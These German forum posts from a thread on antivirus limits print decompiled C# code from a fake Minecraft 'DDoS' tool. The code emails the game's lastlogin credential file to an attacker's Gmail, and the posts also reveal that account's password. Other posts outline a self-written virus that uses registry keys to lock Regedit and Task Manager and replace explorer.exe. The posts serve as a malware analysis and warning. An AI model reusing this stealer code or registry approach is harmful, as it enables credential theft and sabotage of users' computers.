Beiträge von Trojaner im Thema „Wie gut sind Anti-Viren wirklich?“

Extra für Losspost! Wieder die FacePalm Sammlung!

Natürlich nicht, denn er ist auch für Windows konzipiert -.-

Losspost. Mac hat Java. Java bedeutet unsicher. Unsicher bedeutet Mac kann Viren haben.
Leute wie du denken einfach sich nichts dabei, aber es gibt trotzdem auch Viren für Mac's, die sind allerdings weniger verbreitet, da es einfach viel mehr Windows Nutzer gibt. Derzeit gibt es sicher mehr Nutzer vom 10 Jahre alten Windows XP als von Mac OS X...

Achso, ok.
Öhm naja, da kann ich dir allerdings nicht weiterhelfen, denn bis jetzt hatte ich nur Microsoft Security Essentials, Avira AntiVir und Avast. Aber soweit ich weiß ist Kaspersy gut bzw sehr gut

R3D_CUB3, es geht doch hier gar nicht darum wie gut die Anti-Viren Software von Marke X ist, sondern darum das allgemein die Anti-Viren nicht alles aufspüren können...

Habe mal eine Zeile zensiert, ohne diese ist der ganze Code nutzlos
Allerdings kann jeder, der ein bisschen Programmierkenntnisse hat auch sowas machen...
Wo steht das übrigens? Hab das nicht gesehen.. :o
//EDIT: Hab den Regeln Thread gefunden, danke für den Hinweis

Diar und ich wollten mal DDoS an seinem Minecraft Server ausprobieren. Er schickte mir dazu einen Link zu einer Mediafire Datei die er über YouTube gefunden hatte.
Als ich die Datei öffnete, machte ich mir keine Sorgen, denn das Programm sah seriös aus. Ich klicke dann schön auf den "DDoS" Button (natürlich mit Diar's Erlaubnis...) , doch nichts passierte!
Da wurde ich langsam misstrauisch und setzte meine Reverse-Engineering Kenntnisse ein. Das Programm war eines der fiesesten überhaupt!
Ich war so schockiert das ich sofort mein Passwort auf ein sehr sicheres geändert habe.
Denn, sobald man das Programm startet, wird folgender Code ausgeführt:

private void Form1_Load(object sender, EventArgs e)
{
    MailMessage message = new MailMessage();
    try
    {
        Attachment item = new Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\.minecraft\lastlogin");
        message.Attachments.Add(item);
        message.From = new MailAddress("neilnetco@gmail.com");
        message.To.Add("neilnetco@gmail.com");
        message.Subject = "LastLoginFile";
        message.Body = "Account H4x3D!";
        [zensiert]
    }
    catch (Exception exception1)
    {
        ProjectData.SetProjectError(exception1);
        Exception exception = exception1;
        ProjectData.ClearProjectError();
    }
}

Hier "übersetze" ich mal den Code:
Als erstes wird auf die Minecraft LastLogin Datei verwiesen, welche die Login Informationen beinhaltet (Der Minecraft Launcher speichert sie da drinnen).
Danach wird eine EMail generiert, von neilnetco@gmail.com an neilnetco@gmail.com. Der Betreff ist "LastLoginFile", der Inhalt "Account H4x3D" und als Anhang dann die LastLogin Datei. Danach wird diese EMail per Google Mail (aka GMail) gesendet. Natürlich war der Autor zu dumm dafür um das PW vom Account zu verschlüsseln, und siehe da, "bonkheads6" ist das Passwort. Natürlich wollte ich Vergeltung und mich in dem Account einloggen, allerdings wurde das Passwort schon vor 34 Tagen geändert.
Also wurden wohl die Daten nicht gesendet, da im Programm das alte Passwort genutzt wird.
Trotzdem warnte ich alle über die Kommentar Funktion von YouTube und meldete natürlich das Video sofort, mit der Begründung das es zu einem Programm verlinkt Login Informationen klaut mit dem Quellcode und genau in der Minute nach dem ich es gesendet hatte, wurde das Video verbannt. (Siehe: http://www.youtube.com/watch?v=gERm0Z3-9QE)

Nach der Sache war ich einfach schockiert, habe sofort mein Minecraft Passwort geändert. Mit der LastLogin Datei kann man einfach mit bisschen Programmierkenntnissen das Minecraft Passwort herausfinden.

Ich werde nicht den Link zum Programm hier bereitstellen.

Also Leute, nochmal: Nicht jeden Scheiß downloaden, und das schon gar nicht bei YouTube Videos.

Es kommt auf den Virus an, zB oder in den Windows Ordner sich einnistet und ob er HKEY_CURRENT_USER oder HKEY_LOCAL_MACHINE bei der Registry modifiziert.

HKEY_CURRENT_USER gilt nur für den derzeitigen Account, aber HKEY_LOCAL_MACHINE für alle Accounts.

Bei den meisten Viren sind die Accounts irrelevant, es wäre besser wenn du eine VM nutzst.

LG

Losspost falsch. Die Registry die du dann öfnest ist nicht die vom PC, sondern die von der Live CD, du musst erst die vom PC importieren.

Schau dir mal das Video zum Update Virus von SemperVideo an, der sperrt genau wie mein Virus auch Regedit und den Task Mananger

EDIT:

Zitat von ytitti_fan

Trojaner Evilshit ist also von Feder Ô-O Das ist ne Domain von Sempervideo wo er Viren "sammelt" um sie zu untersuchen bzw. herrauszufinden, wie man etwas gegen die Viren machen kann (zb. Bundestrojaner)

Falsch. evilshi*t.de und evil-shi*t.de sind nicht das selbe
(sh*it wird geblockt bzw zensiert, darum das * entfernen)

Zitat von XPhenoxX

Ist dein Virus denn auch Immun gegen Systemrechte?

Hmm habs noch nicht getestet, werde es aber mal tun

Zitat von rinukkusu

Also ich für meinen Teil bewundere Leute, die die Zeit und den Verstand aufbringen können und so etwas in ihrer Freizeit und noch dazu zum Spaß programmieren.

Also du bewunderst Leute die Viren in ihrer Freizeit schreiben und dann verbreiten um anderen PCs zu schaden? oO

HG, ich muss dir bei dem Beitrag zustimmen, ich verachte auch Leute die das zum Spaß machen und dann es verbreiten, aber ich hab dies nicht verbreitet und auch nur auf meiner eigenen VM getestet. Durch den Test fand ich nebenbei heraus das der Virus gar nicht erkannt wird, was mich schockierte. Darum auch der Thread hier.

Es lauern auch andere Gefahren, soziale Netzwerke oder gefährliche Webseiten die eure persönlichen Daten klauen etc.
Ich selbst nutze zB Facebook nicht. Denn ich brauch es nicht.

Also Leute, nur wenn es wirklich sein muss auf Webseiten anmelden und am besten immer wieder sogenannte Trash Emails nutzen.

LG Troja

Weiß nicht, ob Avira das dann erkennen würde, denn ich hab kein Avira (Avast FTW)
Der Virus nistet sich über die Registry ein, es werden insgesamt 3 Registry Schlüssel geändert.
Einer für den Task Manager, damit er gesperrt wird, einer für Regedit.exe, damit es auch gesperrt wird , und einer damit der Virus die explorer.exe ersetzen kann.

c# ftw

Testzwecke. Wollte wissen ob ich meinen eigenen Virus aus einer VM entfernen kann
Ergebnis: Ging nicht
Außerdem werde ich ihn später Evilshit.de schicken, das ist ein Projekt von Feder, wo er Viren entschlüsselt.
Mal kucken ob er herausfinden wird das ich es geschrieben hab

Der Virus ist übrigens auf meinem Dropbox Account gehostet. Den Link für ihn haben nur Diar und Losspost bekommen.

Ja, aber er wird nicht als Virus erkannt

Du kannst ihn gar nicht downloaden, denn er wurde nie veröffenlicht, also, musst dir keine Sorgen machen

Hallo liebe Community,
Ich hab heute aus Test-Zwecken einen Virus geschrieben, der so fies ist das er Regedit und den Task Mgr für alle Accounts sperrt.
Sogar der Administrator Account kann dagegen nichts tun. Außerdem ersetzt er die Explorer.exe beim Start, so das der Virus statt der Explorer.exe startet.

Der PC wird durch ihn praktisch unbrauchbar.

Die einzige Lösung so einen Virus weg zubekommen ist entweder man bootet eine Live-CD oder installiert Windows neu.

Wie kann so ein fieser Virus nicht von Anti Viren entdeckt werden?
Dabei ist er nicht mal verschlüsselt und bringt quasi den Source Code mit.

Virus Scans:
https://www.virustotal.com/fil…b38c/analysis/1359479691/
(Ja, die Datei heißt avast.exe :D)
Nur eine von 46 Anti Viren hat ihn als Virus erkannt und das war McAfee-GW-Edition,
erkannte meinen Virus als Heuristic.BehavesLike.Win32.Suspicious-BAY.G.

Leute, vertraut nicht Blind Anti-Viren, downloadet nicht alles aus dem Internet nur weil ihr einen Anti Virus habt...

LG Trojaner